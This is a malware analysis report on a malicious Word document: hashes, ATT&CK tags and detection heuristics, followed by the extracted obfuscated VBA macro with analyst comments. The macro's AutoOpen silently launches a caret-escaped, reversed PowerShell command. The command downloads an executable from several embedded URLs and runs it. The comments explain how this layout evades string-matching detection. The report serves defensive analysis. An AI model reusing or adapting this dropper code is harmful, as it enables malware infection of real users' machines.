Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9acc1502c8a145e5…

MALICIOUS

Office (OLE)

Size: 69.1 KB · Created: 2018-09-13 16:15:00 · Authoring application: Microsoft Office Word · First seen: 2019-02-10
MD5: d359be0031f1a92bd886699843d0430f SHA-1: 56173a10b573e98f60baa79a9822839f89e28f14 SHA-256: 9acc1502c8a145e569fb80ec294f4077f10c7a668f7c8032aaf4464e1d8293ef
Risk Score: 142

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. Its AutoOpen macro passes a string assembled by helper functions to Shell, so a command is executed as soon as the document is opened; the fragments visible in that string are consistent with downloading and running a second-stage payload. The ClamAV detection 'Doc.Downloader.Pederr-6686124-0' further supports its downloader functionality.

Heuristics 5

  • ClamAV: Doc.Downloader.Pederr-6686124-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Pederr-6686124-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5059 bytes
SHA-256: c7109f8059d4ff69b243179bae38f0265f959bed87df01aa2d73cf98667169bd
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ufsFjVXnw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header as exported by olevba. VB_Name is a random-looking
' identifier, and VB_Base = "1Normal.ThisDocument" is consistent with this
' being the document's own ThisDocument module, i.e. the module that hosts
' the AutoOpen entry point that follows.
Sub AutoOpen()
' Auto-executing entry point: Word runs this Sub when the document is opened
' (the OLE_VBA_AUTOOPEN heuristic in the report keys on exactly this name).
' Apart from the single Shell call below, every statement in this Sub is
' filler: local arrays are dimensioned, populated with arbitrary numeric
' literals, and never read again anywhere in the Sub.
' "On Error Resume Next" is split over line continuations ("_"), so the
' statement never appears on one physical line; any runtime error in the
' chain below is silently ignored and execution continues.
On _
Error _
Resume _
Next
   ' Decoy array: assigned, never read. The same pattern repeats for every
   ' Dim/ReDim block in this Sub.
   Dim oKTFKz()
ReDim oKTFKz(2)
oKTFKz(0) = 331545501
oKTFKz(1) = 211190541

   Dim kaolU()
ReDim kaolU(5)
kaolU(0) = 600
kaolU(1) = 273765312
kaolU(2) = 65
kaolU(3) = 25
kaolU(4) = 7736

   Dim OwQrip()
ReDim OwQrip(2)
OwQrip(0) = 114
OwQrip(1) = 54

   Dim iaXZc()
ReDim iaXZc(4)
iaXZc(0) = 389237678
iaXZc(1) = 54
iaXZc(2) = 3
iaXZc(3) = 1

   Dim BTVJCj()
ReDim BTVJCj(5)
BTVJCj(0) = 6
BTVJCj(1) = 82
BTVJCj(2) = 410
BTVJCj(3) = 318
BTVJCj(4) = 891

   Dim wYpjQt()
ReDim wYpjQt(5)
wYpjQt(0) = 65
wYpjQt(1) = 94221562
wYpjQt(2) = 9
wYpjQt(3) = 9
wYpjQt(4) = 2

   Dim HBjpzz()
ReDim HBjpzz(5)
HBjpzz(0) = 279345813
HBjpzz(1) = 8
HBjpzz(2) = 191
HBjpzz(3) = 7
HBjpzz(4) = 22

   Dim DKrKY()
ReDim DKrKY(2)
DKrKY(0) = 3106
DKrKY(1) = 48

' The only statement with an effect. The command string handed to Shell is
' the concatenation of three function results: sIvKY (defined further down
' in this listing) and zWLDbJpPLcW / jEAtjhKb (not within the truncated
' preview). sIvKY visibly assembles a cmd.exe command line whose letters are
' partly produced by arithmetic inside Chr() and whose body is caret-escaped
' and written back-to-front (e.g. the fragment "}}{hctac"), a layout meant
' to defeat simple string matching on the macro source.
' Format(0) evaluates to the string "0", which coerces to WindowStyle 0
' (vbHide), so the spawned command gets no visible window.
' The "@" appended to Shell is a type-declaration suffix; presumably
' tolerated by VBA without changing the call, but it means a rule that looks
' for "Shell " or "Shell(" will miss this line — confirm on the interpreter.
Shell@ sIvKY + zWLDbJpPLcW + jEAtjhKb, Format(0)
   ' Further decoy arrays after the real work has been done.
   Dim EzTsL()
ReDim EzTsL(5)
EzTsL(0) = 424262663
EzTsL(1) = 636
EzTsL(2) = 424272988
EzTsL(3) = 395
EzTsL(4) = 336623454

   Dim Inrskf()
ReDim Inrskf(5)
Inrskf(0) = 115611113
Inrskf(1) = 1
Inrskf(2) = 942
Inrskf(3) = 5
Inrskf(4) = 37

   Dim cIkQJ()
ReDim cIkQJ(4)
cIkQJ(0) = 3
cIkQJ(1) = 19
cIkQJ(2) = 164
cIkQJ(3) = 2606

   Dim dduUc()
ReDim dduUc(4)
dduUc(0) = 852
dduUc(1) = 7947
dduUc(2) = 7
dduUc(3) = 475

End Sub



Attribute VB_Name = "WqBQHiuq"
' Start of the second module in the extracted VBA project (olevba
' concatenates modules into one macros.bas). The Function that follows,
' sIvKY, is the first of the three string pieces that AutoOpen passes to
' Shell; it uses the same decoy-array padding and the same split
' "On Error Resume Next" as AutoOpen. Its body runs past the end of this
' truncated preview.
Function sIvKY()

On _
Error _
Resume _
Next
Dim JGIqnU()
ReDim JGIqnU(4)
JGIqnU(0) = 4
JGIqnU(1) = 1
JGIqnU(2) = 93
JGIqnU(3) = 6

   Dim oCrEq()
ReDim oCrEq(5)
oCrEq(0) = 698
oCrEq(1) = 18
oCrEq(2) = 423
oCrEq(3) = 73
oCrEq(4) = 4

tbXTzFfUQXp = Format(Chr(4 + 0 + 1 + 1 + 93)) + "md /V:^O/" + Format(Chr(3 + 0 + 0 + 1 + 63)) + Format(Chr(1 + 0 + 0 + 0 + 33)) + "s^et " + "^Q2^B=^ ^ ^ ^ ^ ^ " + "^ ^ ^    ^    ^ }}{h" + Format(Chr(4 + 0 + 1 + 1 + 93)) + "t^a" + Format(Chr(4 + 0 + 1 + 1 + 93)) + "}" + "^;^k^a" + "er^b;^sl^z^$^ ^me^tI-e^kov" + "nI;)^sl^z$^ ,^l^" + "jN^$(eli^Fd^aoln^woD^.wXM^$^{" + "^yr^t{)^EGP^$ ni ^" + "ljN$(h" + Format(Chr(4 + 0 + 1 + 1 + 93)) + "aerof^;^'exe.'+^j^T"
Dim XwIDKm()
ReDim XwIDKm(4)
XwIDKm(0) = 3
XwIDKm(1) = 336
XwIDKm(2) = 70
XwIDKm(3) = 714

   Dim qGjKw()
ReDim qGjKw(5)
qGjKw(0) = 3
qGjKw(1) = 426928655
qGjKw(2) = 8
qGjKw(3) = 31
qGjKw(4) = 87

   Dim MpLBiz()
ReDim MpLBiz(2)
MpLBiz(0) = 6
MpLBiz(1) = 97

   Dim PhSbY()
ReDim PhSbY(3)
PhSbY(0) = 6
PhSbY(1) = 25869587
PhSbY(2) = 3010

vmvvfQEOm = "U$+'^\'+" + Format(Chr(4 + 0 + 1 + 1 + 93)) + "il^b^up" + "^:vne$^=^s^lz^$;^'^0^8" + "4^' = j^TU$^;)'@^'(t^il" + "^pS.'^LJVs^7z^5^sE^" + "8/mo" + Format(Chr(4 + 0 + 1 + 1 + 93)) + ".^xfra^t^la//:^" + "pt^th@lo3t^1^JV/b^a^lt^s^et/" + "if.^monat^ad.s" + "a^mot//^:ptth^@A^HNv^172/^" + "ur^.na^f^s^urbi^l//^:p^t^th@M^" + "zW^6^kb" + "^X^HeJ/st^" + "o^hs^pan^s-^p^w/" + Format(Chr(4 + 0 + 1 + 1 + 93)) + "^oli^ah/om^ed" + "/nv^." + Format(Chr(4 + 0 + 1 + 1 + 93)) + "^"
Dim zTtitw()
ReDim zTtitw(3)
zTtitw(0) = 62
zTtitw(1) = 339030795
zTtitw(2) = 25

   Dim BOqJM()
ReDim BOqJM(4)
BOqJM(0) = 94
BOqJM(1) = 5
BOqJM(2) = 53855125
BOqJM(3) = 52

   Dim TkEtt()
ReDim TkEtt(5)
TkEtt(0) = 442350421
TkEtt(1) = 7801
TkEtt(2) = 19
TkEtt(3) = 704
TkEtt(4) = 92

   Dim EGwMFZ()
ReDim EGwMFZ(3)
EGwMFZ(0) = 9466
EGwMFZ(1) = 6
EGwMFZ(2) = 799

   Dim pVCsI()
ReDim pVCsI(3)
pVCsI(0) = 507
pVCsI(1) = 446357375
pVCsI(2) = 2603

zCskwn = "otv^.eti^s" + "^b^e^w//:^pt^t^" + "h^@^Y^I" + Format(Chr(3 + 0 + 0 + 1 + 63)) + "u^d" + "^1^5w^S/^ten^.^gninoke^il^im^" + "a^f//^:^ptth^'^=^EG^P^$;tne" + "^i^l" + Format(Chr(3 + 0 + 0 + 1 + 63)) + "^be^W.^"
Dim ZAuFF()
ReDim ZAuFF(5)
ZAuFF(0) = 6042
ZAuFF(1) = 4617
ZAuFF(2) = 13
ZAuFF(3) = 49
ZAuFF(4) = 9

   Dim LEwNok()
ReDim LEwNok(4)
LEwNok(0) = 464073611
LEwNok(
... (truncated)